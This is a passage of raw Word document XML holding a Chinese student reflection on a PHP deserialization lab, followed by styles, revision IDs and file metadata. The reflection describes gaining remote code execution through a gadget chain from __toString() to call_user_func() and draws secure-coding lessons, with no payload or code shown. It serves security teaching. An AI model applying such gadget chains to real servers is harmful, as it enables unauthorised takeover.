          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>利用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>链实现远程代码执行，我切实体会到反序列化漏洞的破坏性——攻击者无需认证即可完全控制服务器。实验中成功执行系统命令并创建文件的结果，让我对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任意代码执行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有了具象化认知。unserialize()直接处理用户输入是灾难性设计。我理解了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永不信任用户输入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的原则，未来开发中将严格避免魔术方法中的高危操作。从__toString()触发到call_user_func()执行的完整链条，让我认识到单一漏洞点可能通过类属性传递形成多米诺效应。这启示我在代码审计时需要全局追踪对象交互路径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E0C82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37E95C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LQ8m0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y0PJt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37E95C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44A31B"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="5944A31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1551FD4"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="61551FD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405D"/>
    <w:rsid w:val="00093442"/>
    <w:rsid w:val="001465EB"/>
    <w:rsid w:val="00172A27"/>
    <w:rsid w:val="00224708"/>
    <w:rsid w:val="00250C7D"/>
    <w:rsid w:val="0026466C"/>
    <w:rsid w:val="00290B5B"/>
    <w:rsid w:val="002E0356"/>
    <w:rsid w:val="00385520"/>
    <w:rsid w:val="003B49FC"/>
    <w:rsid w:val="004139F2"/>
    <w:rsid w:val="004155C0"/>
    <w:rsid w:val="004233FA"/>
    <w:rsid w:val="00437BA3"/>
    <w:rsid w:val="004757C3"/>
    <w:rsid w:val="00547840"/>
    <w:rsid w:val="00741891"/>
    <w:rsid w:val="007F7BC3"/>
    <w:rsid w:val="00866D1D"/>
    <w:rsid w:val="008C7F28"/>
    <w:rsid w:val="00980B2B"/>
    <w:rsid w:val="00A171A2"/>
    <w:rsid w:val="00B450C4"/>
    <w:rsid w:val="00B476E3"/>
    <w:rsid w:val="00B941F7"/>
    <w:rsid w:val="00CB4273"/>
    <w:rsid w:val="00CB7C6C"/>
    <w:rsid w:val="00D515D5"/>
    <w:rsid w:val="00EA39CA"/>
    <w:rsid w:val="049D48CE"/>
    <w:rsid w:val="0575419C"/>
    <w:rsid w:val="08880CA1"/>
    <w:rsid w:val="08B1373D"/>
    <w:rsid w:val="0D0A74C6"/>
    <w:rsid w:val="0D5253D4"/>
    <w:rsid w:val="0D605D31"/>
    <w:rsid w:val="0DF80343"/>
    <w:rsid w:val="0E8337DA"/>
    <w:rsid w:val="0E9C3654"/>
    <w:rsid w:val="0EFA6789"/>
    <w:rsid w:val="0F0E3F60"/>
    <w:rsid w:val="116326A0"/>
    <w:rsid w:val="12031B42"/>
    <w:rsid w:val="12E62490"/>
    <w:rsid w:val="1A334EF5"/>
    <w:rsid w:val="1CBA4E5F"/>
    <w:rsid w:val="1E403142"/>
    <w:rsid w:val="1EC14044"/>
    <w:rsid w:val="28757E8C"/>
    <w:rsid w:val="2AD825A8"/>
    <w:rsid w:val="2B5465DD"/>
    <w:rsid w:val="2C4E2460"/>
    <w:rsid w:val="2D9E5321"/>
    <w:rsid w:val="2DA7293E"/>
    <w:rsid w:val="2E490C9F"/>
    <w:rsid w:val="2F866E22"/>
    <w:rsid w:val="2FD1009E"/>
    <w:rsid w:val="30E02716"/>
    <w:rsid w:val="32045250"/>
    <w:rsid w:val="32A44F22"/>
    <w:rsid w:val="34042EE0"/>
    <w:rsid w:val="34AC10D9"/>
    <w:rsid w:val="35A90231"/>
    <w:rsid w:val="38A3523A"/>
    <w:rsid w:val="39312C51"/>
    <w:rsid w:val="39397D91"/>
    <w:rsid w:val="39EB70E7"/>
    <w:rsid w:val="3ABF0B4A"/>
    <w:rsid w:val="3B6C0C93"/>
    <w:rsid w:val="3C613794"/>
    <w:rsid w:val="3EFD746B"/>
    <w:rsid w:val="3F261A88"/>
    <w:rsid w:val="3FD22766"/>
    <w:rsid w:val="40210BCD"/>
    <w:rsid w:val="427A50E5"/>
    <w:rsid w:val="43851182"/>
    <w:rsid w:val="46F37995"/>
    <w:rsid w:val="474A3B34"/>
    <w:rsid w:val="477E528F"/>
    <w:rsid w:val="48305A7C"/>
    <w:rsid w:val="49AA458F"/>
    <w:rsid w:val="4AE0646B"/>
    <w:rsid w:val="4D640612"/>
    <w:rsid w:val="50067440"/>
    <w:rsid w:val="51E56BDF"/>
    <w:rsid w:val="529A56E5"/>
    <w:rsid w:val="52CA39B6"/>
    <w:rsid w:val="53257B4E"/>
    <w:rsid w:val="54C005C6"/>
    <w:rsid w:val="554D280E"/>
    <w:rsid w:val="567E24A2"/>
    <w:rsid w:val="578F2469"/>
    <w:rsid w:val="5EBE6789"/>
    <w:rsid w:val="5FA84AE5"/>
    <w:rsid w:val="5FFD2C0B"/>
    <w:rsid w:val="604C23EA"/>
    <w:rsid w:val="60CB3A18"/>
    <w:rsid w:val="616B6BE8"/>
    <w:rsid w:val="62C01DA4"/>
    <w:rsid w:val="667208B3"/>
    <w:rsid w:val="66753C67"/>
    <w:rsid w:val="69120BD7"/>
    <w:rsid w:val="693335F4"/>
    <w:rsid w:val="69930147"/>
    <w:rsid w:val="6AC202A3"/>
    <w:rsid w:val="6ADD045D"/>
    <w:rsid w:val="6B2262B8"/>
    <w:rsid w:val="6CF22103"/>
    <w:rsid w:val="6D0E6E5C"/>
    <w:rsid w:val="6D2C3C32"/>
    <w:rsid w:val="6ED21161"/>
    <w:rsid w:val="6FFD1973"/>
    <w:rsid w:val="7030554C"/>
    <w:rsid w:val="70A338E5"/>
    <w:rsid w:val="71B3322F"/>
    <w:rsid w:val="72DD0F79"/>
    <w:rsid w:val="740E3A28"/>
    <w:rsid w:val="74B977A1"/>
    <w:rsid w:val="7A29160C"/>
    <w:rsid w:val="7A60215E"/>
    <w:rsid w:val="7BBA17D2"/>
    <w:rsid w:val="7C99416E"/>
    <w:rsid w:val="7D2012E9"/>
    <w:rsid w:val="7D2C5EE0"/>
    <w:rsid w:val="7DB01C8C"/>
    <w:rsid w:val="7E0362EB"/>
    <w:rsid w:val="7E2A1263"/>
    <w:rsid w:val="7EAD50A6"/>
    <w:rsid w:val="7F60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  <w:szCs w:val="24"/>
    </w:r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  <w:style w:type="table" w:customStyle="1" w:styleId="9">
    <w:name w:val="无格式表格 41"/>
    <w:basedOn w:val="4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  <w:style w:type="table" w:customStyle="1" w:styleId="11">
    <w:name w:val="无格式表格 11"/>
    <w:basedOn w:val="4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2">
    <w:name w:val="无格式表格 42"/>
    <w:basedOn w:val="4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3">
    <w:name w:val="Plain Table 3"/>
    <w:basedOn w:val="4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4">
    <w:name w:val="Plain Table 4"/>
    <w:basedOn w:val="4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5">
    <w:name w:val="Grid Table 1 Light"/>
    <w:basedOn w:val="4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100</Words>
  <Characters>119</Characters>
  <Lines>180</Lines>
  <Paragraphs>99</Paragraphs>
  <TotalTime>5</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>123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2024-11-21T13:08:00Z</dcterms:created>
  <dc:creator>Lenovo</dc:creator>
  <cp:lastModifiedBy>蒋枘言</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-06-06T15:14:03Z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4D7E0E4BD3FA4F30AF7B2E42EAB9EA90_12</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="KSOTemplateDocerSaveRecord">
    <vt:lpwstr>eyJoZGlkIjoiNDgzNzlkZmIxMjc2MmEzN2FjNzA2NjU0M2NkNWNhZWUiLCJ1c2VySWQiOiIxNzAyMzkzNTU5In0=</vt:lpwstr>
  </property>
</Properties>
</file>